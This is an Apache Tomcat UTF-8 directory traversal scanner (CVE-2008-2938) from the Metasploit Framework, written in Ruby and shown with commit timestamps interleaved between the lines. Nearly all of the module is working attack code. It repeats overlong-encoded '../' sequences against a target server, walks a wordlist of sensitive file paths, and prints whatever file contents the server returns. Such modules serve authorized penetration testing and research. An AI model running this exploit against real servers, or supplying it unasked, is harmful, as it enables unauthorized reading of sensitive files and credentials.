2010-08-23 16:17:43 +00:00
|
|
|
##
|
2012-03-01 22:54:04 +00:00
|
|
|
# $Id$
|
2010-08-23 16:17:43 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
##
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
2012-02-21 01:40:50 +00:00
|
|
|
# web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/
|
2010-08-23 16:17:43 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Auxiliary
|
|
|
|
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
2012-02-03 21:43:21 +00:00
|
|
|
include Msf::Auxiliary::WmapScanServer
|
2010-08-23 16:17:43 +00:00
|
|
|
include Msf::Auxiliary::Scanner
|
|
|
|
|
|
|
|
def initialize
|
|
|
|
super(
|
|
|
|
'Name' => 'Tomcat UTF-8 Directory Traversal Vulnerability',
|
2012-03-01 22:59:54 +00:00
|
|
|
'Version' => '$Revision$',
|
2010-08-23 16:17:43 +00:00
|
|
|
'Description' => %q{
|
|
|
|
This module tests whether a directory traversal vulnerablity is present
|
|
|
|
in versions of Apache Tomcat 4.1.0 - 4.1.37, 5.5.0 - 5.5.26 and 6.0.0
|
|
|
|
- 6.0.16 under specific and non-default installations. The connector must have
|
|
|
|
allowLinking set to true and URIEncoding set to UTF-8. Furthermore, the
|
|
|
|
vulnerability actually occurs within Java and not Tomcat; the server must
|
|
|
|
use Java versions prior to Sun 1.4.2_19, 1.5.0_17, 6u11 - or prior IBM Java
|
|
|
|
5.0 SR9, 1.4.2 SR13, SE 6 SR4 releases. This module has only been tested against
|
|
|
|
RedHat 9 running Tomcat 6.0.16 and Sun JRE 1.5.0-05. You may wish to change
|
2011-08-29 03:13:22 +00:00
|
|
|
FILE (hosts,sensitive files), MAXDIRS and RPORT depending on your environment.
|
2010-08-23 16:17:43 +00:00
|
|
|
},
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
[ 'URL', 'http://tomcat.apache.org/' ],
|
|
|
|
[ 'OSVDB', '47464' ],
|
|
|
|
[ 'CVE', '2008-2938' ],
|
|
|
|
[ 'URL', 'http://www.securityfocus.com/archive/1/499926' ],
|
|
|
|
],
|
2011-08-29 03:13:22 +00:00
|
|
|
'Author' => [ 'patrick','guerrino <ruggine> di massa' ],
|
2010-08-23 16:17:43 +00:00
|
|
|
'License' => MSF_LICENSE
|
|
|
|
)
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
Opt::RPORT(8080),
|
2011-08-29 03:13:22 +00:00
|
|
|
OptPath.new('SENSITIVE_FILES', [ true, "File containing senstive files, one per line",
|
|
|
|
File.join(Msf::Config.install_root, "data", "wordlists", "sensitive_files.txt") ]),
|
2010-08-23 16:17:43 +00:00
|
|
|
OptInt.new('MAXDIRS', [ true, 'The maximum directory depth to search', 7]),
|
|
|
|
], self.class)
|
|
|
|
end
|
|
|
|
|
2011-08-29 03:13:22 +00:00
|
|
|
def extract_words(wordfile)
|
|
|
|
return [] unless wordfile && File.readable?(wordfile)
|
|
|
|
begin
|
|
|
|
words = File.open(wordfile, "rb") do |f|
|
|
|
|
f.read
|
|
|
|
end
|
|
|
|
rescue
|
|
|
|
return []
|
|
|
|
end
|
|
|
|
save_array = words.split(/\r?\n/)
|
|
|
|
return save_array
|
|
|
|
end
|
2010-08-23 16:17:43 +00:00
|
|
|
|
2011-08-29 03:13:22 +00:00
|
|
|
def find_files(files)
|
2010-08-24 18:22:48 +00:00
|
|
|
traversal = '/%c0%ae%c0%ae'
|
2010-08-23 16:17:43 +00:00
|
|
|
|
2011-08-29 03:13:22 +00:00
|
|
|
1.upto(datastore['MAXDIRS']) do |level|
|
|
|
|
try = traversal * level
|
|
|
|
res = send_request_raw(
|
|
|
|
{
|
|
|
|
'method' => 'GET',
|
|
|
|
'uri' => try + files,
|
|
|
|
}, 25)
|
|
|
|
if (res and res.code == 200)
|
|
|
|
print_status("Request ##{level} may have succeeded on #{rhost}:#{rport}:file->#{files}! Response: \r\n#{res.body}")
|
2011-11-20 02:12:07 +00:00
|
|
|
@files_found << files
|
2011-08-29 03:13:22 +00:00
|
|
|
break
|
|
|
|
elsif (res and res.code)
|
2012-02-21 20:13:12 +00:00
|
|
|
vprint_error("Attempt ##{level} returned HTTP error #{res.code} on #{rhost}:#{rport}:file->#{files}")
|
2011-08-29 03:13:22 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def run_host(ip)
|
|
|
|
@files_found = []
|
|
|
|
|
2010-08-23 16:17:43 +00:00
|
|
|
begin
|
|
|
|
print_status("Attempting to connect to #{rhost}:#{rport}")
|
|
|
|
res = send_request_raw(
|
|
|
|
{
|
|
|
|
'method' => 'GET',
|
|
|
|
'uri' => '/',
|
|
|
|
}, 25)
|
|
|
|
|
|
|
|
if (res)
|
2011-08-29 03:13:22 +00:00
|
|
|
extract_words(datastore['SENSITIVE_FILES']).each do |files|
|
|
|
|
find_files(files) unless files.empty?
|
|
|
|
end
|
|
|
|
end
|
2010-08-23 16:17:43 +00:00
|
|
|
|
2011-08-29 03:13:22 +00:00
|
|
|
if not @files_found.empty?
|
|
|
|
print_good("File(s) found:")
|
2010-08-23 16:17:43 +00:00
|
|
|
|
2011-08-29 03:13:22 +00:00
|
|
|
@files_found.each do |f|
|
2012-03-18 01:37:42 +00:00
|
|
|
print_good(f)
|
2010-08-23 16:17:43 +00:00
|
|
|
end
|
2011-08-29 03:13:22 +00:00
|
|
|
else
|
2011-10-17 02:42:01 +00:00
|
|
|
print_good("No File(s) found")
|
2010-08-23 16:17:43 +00:00
|
|
|
end
|
2010-08-24 18:22:48 +00:00
|
|
|
|
2010-08-23 16:17:43 +00:00
|
|
|
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
|
|
|
rescue ::Timeout::Error, ::Errno::EPIPE
|
|
|
|
end
|
|
|
|
end
|
2011-10-17 02:42:01 +00:00
|
|
|
end
|